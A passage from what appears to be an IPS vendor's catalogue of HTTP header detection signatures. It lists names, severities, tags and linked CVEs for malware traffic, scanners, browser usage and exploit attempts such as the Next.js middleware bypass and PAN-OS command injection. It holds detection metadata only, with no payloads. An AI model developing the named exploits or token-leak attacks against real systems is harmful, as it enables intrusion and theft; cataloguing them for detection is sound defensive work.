Tags: Any Operating System, Any Hardware, PROMOTIC, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1335-5242
Vulnerability: Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Morcut-Malware-Traffic-Detected

About this situation: Morcut Malware Traffic Detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Morcut, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Morcut-Malware
Description:
Back to top

HTTP_CSH-Morfeus-Scanner-Usage

About this situation: Morfeus Scanner activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Morfeus, Any Operating System not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Morfeus-Scanner
Description:
Back to top

HTTP_CSH-MOVEit-Transfer-SQL-Injection-Post-Exploit

About this situation: An attempt to exploit a vulnerability in MOVEit detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1597-5242
Last changed: sgpkg-ips-1597-5242
Vulnerability: MOVEit-Transfer-SQL-Injection-Post-Exploit
Description:
Back to top

HTTP_CSH-Mozi-Botnet-Traffic

About this situation: Mozi botnet traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Mozi-Botnet-Traffic
Description:
Back to top

HTTP_CSH-Mozilla-Minefield-Browser-Usage

About this situation: Mozilla Minefield browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Mozilla Minefield, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-207-2032
Last changed: sgpkg-ips-207-2032
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Mozilla-SeaMonkey-Browser-Usage

About this situation: Mozilla SeaMonkey browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-207-2032
Last changed: sgpkg-ips-1010-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability

About this situation: Attempt to exploit a vulnerability in Microsoft Forefront Unified Access Gateway detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Unified Access Gateway, MS2011-10, CVE2011, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability
Description:
Back to top

HTTP_CSH-MS-Suspicious-Headers-Detected

About this situation: Malicious HTTP headers detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CSH-MSN-Live-Messenger-Over-HTTP

About this situation: MSN Messenger Over HTTP
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, MSN Messenger, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-207-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: MSN-Messenger-Usage
Description:
Back to top

HTTP_CSH-MSNBot-Media-Web-Spider

About this situation: MSNBot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Microsoft MSNBot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-MSNBot-Web-Spider

About this situation: MSNBot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Microsoft MSNBot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Mumblehard-Spambot-Traffic

About this situation: Mumblehard spambot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Mumblehard-Spambot
Description:
Back to top

HTTP_CSH-Native-PowerShell-User-Agent

About this situation: A native Powershell user agent usage detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description:
Back to top

HTTP_CSH-Need2Find-Toolbar-Activity

About this situation: Need2Find Internet Explorer toolbar activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Need2Find Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Need2Find-Toolbar
Description:
Back to top

HTTP_CSH-Negative-Content-Length-Value

About this situation: A negative Content-Length value detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2004, CVE2006, CVE2007, CVE2020, Any Operating System not specific, Any Software not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Apache-Mod-Proxy-DoS
HTTP-Nagios-Content-Length-Handling-Buffer-Overflow
HTTP-MiniWeb-Negative-Contentlength-DoS
Intel-AMT-And-ISM-Privilege-Escalation-CVE-2020-8758
Description:
Back to top

HTTP_CSH-Netcraft-Crawler

About this situation: Netcraft crawler detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-565-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in NetGain Systems Enterprise Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGain Systems Enterprise Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1527-5242
Vulnerability: Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal
Description:
Back to top

HTTP_CSH-Netgate-Pfsense-Pfblockerng-Host-Command-Injection

About this situation: An attempt to exploit a vulnerability in Netgate pfSense pfBlockerNG detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Netgate-Pfsense-Pfblockerng-Host-Command-Injection
Description:
Back to top

HTTP_CSH-Netscape-Browser-Usage

About this situation: Netscape browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Netscape, Any Operating System not specific, Browsers, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1392-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Netshagg

About this situation: NetShagg traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, NetShagg, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Netshagg
Description:
Back to top

HTTP_CSH-New.Net-Toolbar-Activity

About this situation: New.Net toolbar activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, New.Net Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: New.Net-Toolbar
Description:
Back to top

HTTP_CSH-Newdotnet

About this situation: NewDotNet traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, NewDotNet, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Newdotnet
Description:
Back to top

HTTP_CSH-NewsGator-NetNewsWire-Usage

About this situation: NetNewsWire RSS reader usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, NewsGator NetNewsWire, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927

About this situation: An attempt to exploit a vulnerability in Next.js detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Vercel Next.js, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1855-5242
Last changed: sgpkg-ips-1855-5242
Vulnerability: Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927
Description:
Back to top

HTTP_CSH-Next.js-Possible-Middleware-Security-Control-Bypass-CVE-2025-29927

About this situation: An HTTP request with a x-middleware-subrequest header detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Vercel Next.js, CVE2025, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1855-5242
Last changed: sgpkg-ips-1855-5242
Vulnerability: Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927
Description:
Back to top

HTTP_CSH-Nginx-0-Length-Headers-Leak-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in nginx HTTP Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, nginx, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Nginx-0-Length-Headers-Leak-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Nikto-Scan-Detect-By-User-Agent

About this situation: Nikto Vulnerability Scanner
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-563-5211
Vulnerability: Nikto-Web-Vulnerability-Scanner
Description:
Back to top

HTTP_CSH-NMAP-Web-Scanning-Activity

About this situation: Nmap network scanner's activities detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nmap, Any Operating System not specific, Suspected Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1825-5242
Vulnerability: NMAP-Web-Scanning-Activity
Description:
Back to top

HTTP_CSH-Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling

About this situation: An attempt to exploit a vulnerability in Node.js detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Node.js, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Vulnerability: Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling
Description:
Back to top

HTTP_CSH-Novell-eDirectory-CVE-2006-5478

About this situation: An attempt to exploit a vulnerability in Novell eDirectory
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1469-5242
Vulnerability: HTTP-Novell-eDirectory-HTTP-Server-Redirection-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1590-5242
Vulnerability: Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow
Description:
Back to top

HTTP_CSH-Novell-Remote-Manager-Off-By-One-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Novell Remote Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Remote Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1641-5242
Vulnerability: Novell-Remote-Manager-Off-By-One-Denial-Of-Service
Description:
Back to top

HTTP_CSH-NTLM-Authentication-Usage

About this situation: Detects the usage of NTLM authentication in an HTTP request
Context: HTTP Request Header Line
Severity: 1
Tags: Windows, Any Hardware, MS2009-04, CVE2009, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP_Microsoft-HTTP-Services-Authentication-Reflection
Description:
Back to top

HTTP_CSH-NTT-Resonant-Ichiro-Mobile-Web-Spider

About this situation: NTT Resonant Ichiro Mobile web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, NTT Resonant Ichiro, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-256-3038
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Nullsoft-Scriptable-Installation-System-Download-Plugin

About this situation: An attempt to download a file was detected
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Nullsoft Scriptable Installation System, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-146-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: Nullsoft-Scriptable-Installation-System-Download-Plugin
Description:
Back to top

HTTP_CSH-Nutch-Open-Source-Robot

About this situation: Nutch Open Source Robot detected.
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic web spider, Any Operating System not specific, Generic web spider not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Obsolete-Chrome-Browser-Usage

About this situation: Obsolete Chrome browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Obsolete-Edge-Browser-Usage

About this situation: Obsolete Edge browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Microsoft Edge, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Obsolete-Firefox-Browser-Usage

About this situation: Obsolete Firefox browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic, Not Latest Browser Versions
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Obsolete-Safari-Browser-Usage

About this situation: Obsolete Safari browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Safari, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Octoshape-P2P-Plugin

About this situation: Media streaming with Octoshare P2P Flash plugin detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Octoshape, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-516-5211
Vulnerability: Octoshape-P2P-Plugin-Usage
Description:
Back to top

HTTP_CSH-Oficla-Traffic

About this situation: Oficla traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Oficla-Malware
Description:
Back to top

HTTP_CSH-OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in OneDev Platform detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, OneDev Platform, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1751-5242
Vulnerability: OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization
Description:
Back to top

HTTP_CSH-OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246

About this situation: An attempt to exploit a vulnerability in OneDev Platform detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, OneDev Platform, CVE2021, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
Description:
Back to top

HTTP_CSH-Onlinegame-Worm-Trojan-Magania

About this situation: OnlineGame Worm Trojan Magania.clfv traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Magania, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSH-OPC-UA-HTTP/XML-Shared-Variables

About this situation: This fingerprint sets shared variables for OPC UA HTTP/XML - do not disable
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

HTTP_CSH-OpenVAS-Scan-Detect-By-User-Agent

About this situation: OpenVAS Vulnerability Scanner
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Vulnerability: OpenVAS-Web-Vulnerability-Scanner
Description:
Back to top

HTTP_CSH-Opera-BitTorrent-Client

About this situation: Opera BitTorrent P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Opera-Browser-Usage

About this situation: Opera browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Opera-Mini-Browser-Usage

About this situation: Opera Mini browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Major Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-1284-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-727-5211
Last changed: sgpkg-ips-1476-5242
Vulnerability: Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal
Description:
Back to top

HTTP_CSH-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1

About this situation: An attempt to exploit a vulnerability in Oracle Application Server Web Cache detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2004, Any Operating System not specific, Oracle Application Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Oracle-Web-Cache-Unspecified-Client-Request-Handling
Description:
Back to top

HTTP_CSH-Overly-Long-Host-Header-Field

About this situation: Detects long HTTP Host header fields, possible buffer overflow exploit
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, CVE2006, Any Operating System not specific, Potential Compromise, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1641-5242
Vulnerability: HTTP-Novell-eDirectory-HTTP-Server-Redirection-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Oversized-Host-Header-Field

About this situation: Detects oversized HTTP Host header fields, possible buffer overflow exploit
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2003, CVE2008, CVE2009, CVE2019, CVE2023, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-170-2032
Last changed: sgpkg-ips-1641-5242
Vulnerability: HTTP-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability
HP-OpenView-Network-Node-Manager-Host-Header-BOF
HP-OpenView-Network-Node-Manager-Snmpviewer.exe-Host-Header-Buffer-Overflow
HP-OpenView-Network-Node-Manager-Webappmon.exe-Cgi-Host-Header-Buffer-Overflow
Novell-Groupwise-Agents-HTTP-Request-Remote-Code-Execution
ABB-Pb610-Panel-Builder-600-Idal-HTTP-Host-Stack-Buffer-Overflow
Citrix-NetScaler-Buffer-Overflow-Vulnerability-CVE-2023-4966
Description:
Back to top

HTTP_CSH-OWASP-CoreRule-Request-944-Application-Attack-Java-944130

About this situation: A request containing a suspicious Java class/function detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Description:
Back to top

HTTP_CSH-P2P-Phex-Client

About this situation: Phex P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Phex, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: Gnutella-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-P2P-SoulSeek-Client

About this situation: SoulSeek P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, SoulSeek, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: SoulSeek-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-P2P-uTorrent-Client

About this situation: uTorrent P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, uTorrent, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Palo-Alto-SSLVPN-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in a Palo Alto appliance
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto SSLVPN Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1802-5242
Vulnerability: Palo-Alto-SSLVPN-Authentication-Bypass
Description:
Back to top

HTTP_CSH-PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400

About this situation: An attempt to exploit a vulnerability in GlobalProtect detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, GlobalProtect, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400
Description:
Back to top

HTTP_CSH-Pear-HTTP_request-Php-Extension-Package

About this situation: Pear HTTP_request Php Extension Package detected.
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic web spider, Any Operating System not specific, Generic web spider not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-PeerCast-HTTP-Authentication-Buffer-Overflow

About this situation: A buffer overflow attempt in PeerCast HTTP Authentication was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, PeerCast, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1588-5242
Vulnerability: PeerCast-HTTP-Authentication-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Pgadmin-Pga4_session-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in pgAdmin detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, pgAdmin, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
